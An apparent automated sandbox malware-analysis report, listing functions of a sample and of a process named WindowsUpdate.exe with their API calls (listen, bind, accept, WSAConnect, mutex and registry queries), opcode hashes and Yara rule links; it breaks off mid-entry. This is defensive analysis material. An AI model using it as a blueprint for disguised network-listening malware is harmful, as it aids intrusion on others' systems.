                                                  • Opcode ID: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
                                                  • Instruction ID: 2715e0f5b76d9e8bf3bfa22bf35e41ec2dcc8bed56e6222f305abdff7d2b472d
                                                  • Opcode Fuzzy Hash: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
                                                  • Instruction Fuzzy Hash: 7BF0A4721046029BD210EA299D41A2BB7E8DF813A8F11093FF4D196282DF79DC5646A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407B1D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileNameSavewcscpy
                                                  • String ID: X
                                                  • API String ID: 3080202770-3081909835
                                                  • Opcode ID: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
                                                  • Instruction ID: df6fc214ccc966a4ef74be52ccb1fa8de01b9f2d97edd1d3ec6f174b54628a36
                                                  • Opcode Fuzzy Hash: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
                                                  • Instruction Fuzzy Hash: C801E5B1E002499FDF00DFE9D8847AEBBF4AF08319F10402AE815E6280DB78A949CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AC82, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040AC9A
                                                  • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040ACC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageSendmemset
                                                  • String ID: "
                                                  • API String ID: 568519121-123907689
                                                  • Opcode ID: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
                                                  • Instruction ID: c9b4fa4cd35477e261f68ac5278df415403352ef960fa58aa17ae8539a272808
                                                  • Opcode Fuzzy Hash: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
                                                  • Instruction Fuzzy Hash: 4E01D635800304EBEB20DF5AC841AEFB7F8FF84745F01802AE854A6281D3349955CF79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004017B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowPlacement.USER32(?,?,?,?,?,0040D8F3,?,General,?,?,?,?,?,00000000,00000001), ref: 004017E0
                                                  • memset.MSVCRT ref: 004017F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlacementWindowmemset
                                                  • String ID: WinPos
                                                  • API String ID: 4036792311-2823255486
                                                  • Opcode ID: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
                                                  • Instruction ID: 403492ab1ae1e8e085d1b686bd15613ed323b870b3f74ac0ef6546771a88dbd4
                                                  • Opcode Fuzzy Hash: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
                                                  • Instruction Fuzzy Hash: BDF0FF71600204ABEB14EFA5D989F6E73E8AF04700F544479E9099B1D1D7B899008B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407AB6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileNameOpenwcscpy
                                                  • String ID: X
                                                  • API String ID: 3246554996-3081909835
                                                  • Opcode ID: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
                                                  • Instruction ID: 22468463e432baa7279a8bf0e718ba1534ae3331c134da9758c07f59fbfd6832
                                                  • Opcode Fuzzy Hash: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
                                                  • Instruction Fuzzy Hash: 6601B2B1D0024CAFCB40DFE9D8856CEBBF8AF09708F10802AE819F6240EB7495458F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AB7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                  • wcsrchr.MSVCRT ref: 0040AB86
                                                  • wcscat.MSVCRT ref: 0040AB9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                  • String ID: _lng.ini
                                                  • API String ID: 383090722-1948609170
                                                  • Opcode ID: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
                                                  • Instruction ID: faf96e17328b6cfe7fea8df6c793311bae4d5162fb77f626620ffa022952bc65
                                                  • Opcode Fuzzy Hash: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
                                                  • Instruction Fuzzy Hash: E6C0125394672070F52233226E13B8F17696F22306F60002FF901280C3EFAC631180AF
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0042917D, Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID:
                                                  • API String ID: 438689982-0
                                                  • Opcode ID: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
                                                  • Instruction ID: 8c22702d92a242b4074cdc0308f2d59ea0ad553ae454c6356856be76eef94a8a
                                                  • Opcode Fuzzy Hash: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
                                                  • Instruction Fuzzy Hash: 2551A775A0021AFBEF15DF95DC81AEEB775FF04340F54849AF805A6241E7389E50CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407EDE, Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcslen.MSVCRT ref: 00407EF0
                                                    • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
                                                    • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
                                                    • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                  • memcpy.MSVCRT ref: 00407F5D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$memcpy$mallocwcslen
                                                  • String ID:
                                                  • API String ID: 726966127-0
                                                  • Opcode ID: 53bb7909089ec0eedd8dd5e24e0ed79610a14058f15925bc4f6bfad5848592c5
                                                  • Instruction ID: 7e4f8ba4ba14ff744b1d1ae1a3210968bf085ae1c99a6b147d894c05d7fb7a00
                                                  • Opcode Fuzzy Hash: 53bb7909089ec0eedd8dd5e24e0ed79610a14058f15925bc4f6bfad5848592c5
                                                  • Instruction Fuzzy Hash: 9E21AC71504605EFD720DF18C880C9AB7F4EF443247108A2EF866AB6A1D734F916CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AD07, Relevance: 5.1, APIs: 4, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  • Opcode ID: cfaf489efad96e13d7650dd90a1e479029915f4aea12b774901758b52b152337
                                                  • Instruction ID: 8f402eb808e7ad555a909232128954833d185930e872f23c51b71e42452eb786
                                                  • Opcode Fuzzy Hash: cfaf489efad96e13d7650dd90a1e479029915f4aea12b774901758b52b152337
                                                  • Instruction Fuzzy Hash: B121F7B0A017009FD7258F6A8545A52FBE5FF90311B29C9AFE108CBAB2D7B8C800CF15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00414C13, Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,00415592,?,?,00415592,004159A7,00000000,?,00415C14,?,00000000), ref: 00414C2E
                                                  • malloc.MSVCRT ref: 00414C36
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C4D
                                                  • free.MSVCRT(00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C54
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$freemalloc
                                                  • String ID:
                                                  • API String ID: 2605342592-0
                                                  • Opcode ID: 9b055066e38bee567b126a3868761c6a9d3deb5596daa05209853c95383d11b4
                                                  • Instruction ID: ac963edc179c34f330cc22ede2b288a34a1f5b158d5d5a2152ff40f2e70c1069
                                                  • Opcode Fuzzy Hash: 9b055066e38bee567b126a3868761c6a9d3deb5596daa05209853c95383d11b4
                                                  • Instruction Fuzzy Hash: 9AF0A77220521E3BE61026A55C40D7B778CEB86375B10072BB910E21C1FD59D80006B4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: WindowsUpdate.exe PID: 4848 Parent PID: 3388 WindowsUpdate.exeCOMMON

                                                  Executed Functions

                                                  Function 1AEB0B20, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • listen.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0BB4
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: listen
                                                  • String ID:
                                                  • API String ID: 3257165821-0
                                                  • Opcode ID: 3bda870026a15519624a2efafb0bf3d68c1b61a09af9f0780e9754fac544ff56
                                                  • Instruction ID: 8be6f4565b682ea921251e05ba22e0823e59262ba981b56cf09c1b00fa64bf5e
                                                  • Opcode Fuzzy Hash: 3bda870026a15519624a2efafb0bf3d68c1b61a09af9f0780e9754fac544ff56
                                                  • Instruction Fuzzy Hash: 442124B1405380AFE712CB54DC89F56BFA8EF42324F0880DBEA449F192D334A909CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB0F3B, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • bind.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0FCF
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: bind
                                                  • String ID:
                                                  • API String ID: 1187836755-0
                                                  • Opcode ID: 0d75bcb03c2e0327e9bb46dba5e20a329abf1923c0ebe1e56a1e1d25f4f72fa3
                                                  • Instruction ID: e3590cde8710d15c7f90d803ec56edbca4181376dda3019ef714217848b08ff8
                                                  • Opcode Fuzzy Hash: 0d75bcb03c2e0327e9bb46dba5e20a329abf1923c0ebe1e56a1e1d25f4f72fa3
                                                  • Instruction Fuzzy Hash: 73218D71509384AFE7128B65CC84F96BFB8EF46320F1884ABE9459B252D264E909CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB0F6E, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • bind.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0FCF
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: bind
                                                  • String ID:
                                                  • API String ID: 1187836755-0
                                                  • Opcode ID: c271397bc32378cbfcc47e2a77ae8d2626717895beb02e22476d6eb51ec7fe09
                                                  • Instruction ID: 1f0ea8fc5a8d56726fbde6525ddd6b634fc26fa0213845f486ede3de3f972abc
                                                  • Opcode Fuzzy Hash: c271397bc32378cbfcc47e2a77ae8d2626717895beb02e22476d6eb51ec7fe09
                                                  • Instruction Fuzzy Hash: 9F119A71500244AEE720CF59DC88F9BFBA8EF45720F1488ABEE099B241D674E908CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB0B5E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • listen.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0BB4
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: listen
                                                  • String ID:
                                                  • API String ID: 3257165821-0
                                                  • Opcode ID: 5f7664efc495dfcafa1f1395119c9515f1f4b8713e3e231fc6c6deb81303585d
                                                  • Instruction ID: e947291b4a76f10510ba23800db590a82235e3c7a8c09f0138c37b887d184306
                                                  • Opcode Fuzzy Hash: 5f7664efc495dfcafa1f1395119c9515f1f4b8713e3e231fc6c6deb81303585d
                                                  • Instruction Fuzzy Hash: AF11A071400244EEEB118F55DC88F9AFF98EF45324F1484A7EE499B245D674E504CBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB0535, Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 1AEB0645
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileMappingOpen
                                                  • String ID:
                                                  • API String ID: 1680863896-0
                                                  • Opcode ID: 912b7f8da437ff3d724c61f909d4600d4f85a8a6e9da3d737656cf9df14851e2
                                                  • Instruction ID: 1b05e7f1edf6802328ddc5378349770784185e9400c880e52a0af9a81ad0d4e3
                                                  • Opcode Fuzzy Hash: 912b7f8da437ff3d724c61f909d4600d4f85a8a6e9da3d737656cf9df14851e2
                                                  • Instruction Fuzzy Hash: D841B0715493C0AFE7128B65DC45F92FFB8EF42220F1884DBE9859B293D265A908C772
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB0CE8, Relevance: 1.6, APIs: 1, Instructions: 95timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessTimes.KERNELBASE(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0D85
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: ProcessTimes
                                                  • String ID:
                                                  • API String ID: 1995159646-0
                                                  • Opcode ID: d77c36aa0985c30ed5f2d60cf3331fb3ee212022cc3b142a1e907c3a78ad0889
                                                  • Instruction ID: fbe4c40b51a0a850ccdb51722c0d078dd950467b5d2463c25247a0609a30c103
                                                  • Opcode Fuzzy Hash: d77c36aa0985c30ed5f2d60cf3331fb3ee212022cc3b142a1e907c3a78ad0889
                                                  • Instruction Fuzzy Hash: E931E072409380AFE7128F65DC45F96BFB8EF03320F0884DBE9859B192D225A909CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB11D9, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: accept
                                                  • String ID:
                                                  • API String ID: 3005279540-0
                                                  • Opcode ID: 8f92cd461625f5d2c740ca2ca7655dec2697f013b0bb528a8b1aa6e724e52930
                                                  • Instruction ID: 225c783e04e8046cee6c296fb6d6a948531a45ff61eb4c6055898a3588f64aff
                                                  • Opcode Fuzzy Hash: 8f92cd461625f5d2c740ca2ca7655dec2697f013b0bb528a8b1aa6e724e52930
                                                  • Instruction Fuzzy Hash: 6E318FB1509380AFE712CB65DC45F96FFE8EF06214F08849AE9849B293D375E909CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB12D4, Relevance: 1.6, APIs: 1, Instructions: 88networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAEventSelect.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB137A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: EventSelect
                                                  • String ID:
                                                  • API String ID: 31538577-0
                                                  • Opcode ID: 3f9e25e2cfdacb66cd2739b56d98da4c3a0280c78372b4e62966fd1b52f1e97b
                                                  • Instruction ID: 2b623128cf0c17939e7b6222e566e83fc846e0619e1a2ad477ed3753f5245873
                                                  • Opcode Fuzzy Hash: 3f9e25e2cfdacb66cd2739b56d98da4c3a0280c78372b4e62966fd1b52f1e97b
                                                  • Instruction Fuzzy Hash: 9B31A0B2409380AFE7128B65CC84F96BFB8EF07320F0984DBE9859B193D224A509C771
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB0A29, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexW.KERNELBASE(?,?), ref: 1AEB0AC9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateMutex
                                                  • String ID:
                                                  • API String ID: 1964310414-0
                                                  • Opcode ID: 99964d0ca475447144b53bf53a87880c2489da9917d09ca3e804dd4dc2ab0efa
                                                  • Instruction ID: 59b03376f0b3ebfda93f09617ce560ca8e83ff8d0885d03e64a0ced7bcbd8980
                                                  • Opcode Fuzzy Hash: 99964d0ca475447144b53bf53a87880c2489da9917d09ca3e804dd4dc2ab0efa
                                                  • Instruction Fuzzy Hash: 443184B1505384AFE712CF65CC85F56FFE8EF06224F0884AEE9858B292D365E904CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB031E, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB03B0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  • Opcode ID: c459cd7bb2144354f3b1de972e30f6a6687de1e634759befcb97990aaf9f9e98
                                                  • Instruction ID: 9a0cc71d490b5606b4082b481f7b7ee3d6730d7ce39c8ebf1899d5e2e94a123f
                                                  • Opcode Fuzzy Hash: c459cd7bb2144354f3b1de972e30f6a6687de1e634759befcb97990aaf9f9e98
                                                  • Instruction Fuzzy Hash: E0217C72504384AFD721CB55CC44F57BFA8AF06220F08859BE9859B292D264E548CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB102D, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • getsockname.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB10B3
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID:
                                                  • API String ID: 3358416759-0
                                                  • Opcode ID: 7f6fdd70aec325abb8e0dc374bc51694cc61cc3bfbb7b8c049b23fbe0ee9a920
                                                  • Instruction ID: fa24bb4303437dc60d2e3024125b360719b84f866ac351092b73c47d5645e6bf
                                                  • Opcode Fuzzy Hash: 7f6fdd70aec325abb8e0dc374bc51694cc61cc3bfbb7b8c049b23fbe0ee9a920
                                                  • Instruction Fuzzy Hash: E8217171508384AFE711CB65DC54F97BFA8EF46320F0884ABEA459B152D264E508CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB0A56, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexW.KERNELBASE(?,?), ref: 1AEB0AC9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateMutex
                                                  • String ID:
                                                  • API String ID: 1964310414-0
                                                  • Opcode ID: 319ff57a6c8a83b6c7bd8ee5906f8b82f30afee9153bae16a3787356b042b791
                                                  • Instruction ID: cc16578672d9d0f8b1364bbbfaa670fae2fbcfa74b787b461a22f6f0087ff2c4
                                                  • Opcode Fuzzy Hash: 319ff57a6c8a83b6c7bd8ee5906f8b82f30afee9153bae16a3787356b042b791
                                                  • Instruction Fuzzy Hash: 75217C71600244AFE720DF69DC89B56FFE8EF05624F1488AAED898B242D771E805CB75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB00E2, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • setsockopt.WS2_32(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0161
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: setsockopt
                                                  • String ID:
                                                  • API String ID: 3981526788-0
                                                  • Opcode ID: 98315c3c012c8d04b12e0095da4c6a69d4e487d0720a76eaffa8fdd06a188e1e
                                                  • Instruction ID: 6c8408fa40a7b577e0712df1df275501d234f97ed7f7cdf48ee10440d18cb068
                                                  • Opcode Fuzzy Hash: 98315c3c012c8d04b12e0095da4c6a69d4e487d0720a76eaffa8fdd06a188e1e
                                                  • Instruction Fuzzy Hash: 48216F72405384AFE7228F55DC44F57FFB8EF46320F08849BEA859B152D275A509CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB05DA, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 1AEB0645
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileMappingOpen
                                                  • String ID:
                                                  • API String ID: 1680863896-0
                                                  • Opcode ID: cff1085b0e0d80b4a49bac79a3bd455df85c9c4b75d93fcfb5540d354be575fb
                                                  • Instruction ID: c63f0e7752b4ed79494f6405e0d1fec9224dbb075e1e172f7ab8d8b2e0fb2434
                                                  • Opcode Fuzzy Hash: cff1085b0e0d80b4a49bac79a3bd455df85c9c4b75d93fcfb5540d354be575fb
                                                  • Instruction Fuzzy Hash: 4421AEB1500240AFE720DF65CC49B56FFA8EF44324F14846AED898B645D771E404CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB06DA, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileView
                                                  • String ID:
                                                  • API String ID: 3314676101-0
                                                  • Opcode ID: 1c40e5e545bf89ec60244162114c1e310b9c46970cc84ea8074243aba3d9d751
                                                  • Instruction ID: eb9d2ef0c72a7605c92b08dc69616ee02819253fe00f32f7d1bbbc819743a20b
                                                  • Opcode Fuzzy Hash: 1c40e5e545bf89ec60244162114c1e310b9c46970cc84ea8074243aba3d9d751
                                                  • Instruction Fuzzy Hash: AA21BB71400204AFE721DF55C888F9AFFE8EF08320F14845AEA898B251D3B1E508CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB16A9, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 1AEB1726
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: Connect
                                                  • String ID:
                                                  • API String ID: 3144859779-0
                                                  • Opcode ID: bfdbd0c4d58fd827ce23373e27af47f5a58df96a7f98cdc3ee840367dfa424e4
                                                  • Instruction ID: 53f008123c543227db7107878a56f7eac0780fc2005cf026ae1ce2d5eb302e3b
                                                  • Opcode Fuzzy Hash: bfdbd0c4d58fd827ce23373e27af47f5a58df96a7f98cdc3ee840367dfa424e4
                                                  • Instruction Fuzzy Hash: 9B21AF71409384AFD712CF65CC44A52BFF4EF06220F0984DAE9858B163D375E918DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB033E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB03B0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  • Opcode ID: 8b36cc719dce4fd7b7041bccfefb19eb99d49043253bd86dfce23ba98cac86a1
                                                  • Instruction ID: 1d75573f99e121084eeee50e189fa1b98ef99d452875441dcda556b8fdc682b0
                                                  • Opcode Fuzzy Hash: 8b36cc719dce4fd7b7041bccfefb19eb99d49043253bd86dfce23ba98cac86a1
                                                  • Instruction Fuzzy Hash: 41119772500604AFE720CE1ACC88F5BFFA8EF05724F1485AAEA459B291D7A1E508CB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB147A, Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 1AEB14F0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: FileView
                                                  • String ID:
                                                  • API String ID: 3314676101-0
                                                  • Opcode ID: 59f1d591886ad6ef5abce2755358e6026ddf7acd3c5b724d4810f78dd6488b3e
                                                  • Instruction ID: 90de62d3e76fcfd52a2351f6131ccd5127dbb9d91efe93e0e80b3057b0b14bc5
                                                  • Opcode Fuzzy Hash: 59f1d591886ad6ef5abce2755358e6026ddf7acd3c5b724d4810f78dd6488b3e
                                                  • Instruction Fuzzy Hash: 34216D764093C4AFD7128F60DC44A42FFB4EF46220F0985DBE9858F163D279A919DB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1AEB0D26, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessTimes.KERNELBASE(?,00000E8C,8646150C,00000000,00000000,00000000,00000000), ref: 1AEB0D85
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.305539953.000000001AEB0000.00000040.00000001.sdmp, Offset: 1AEB0000, based on PE: false
                                                  Similarity
                                                  • API ID: ProcessTimes
                                                  • String ID:
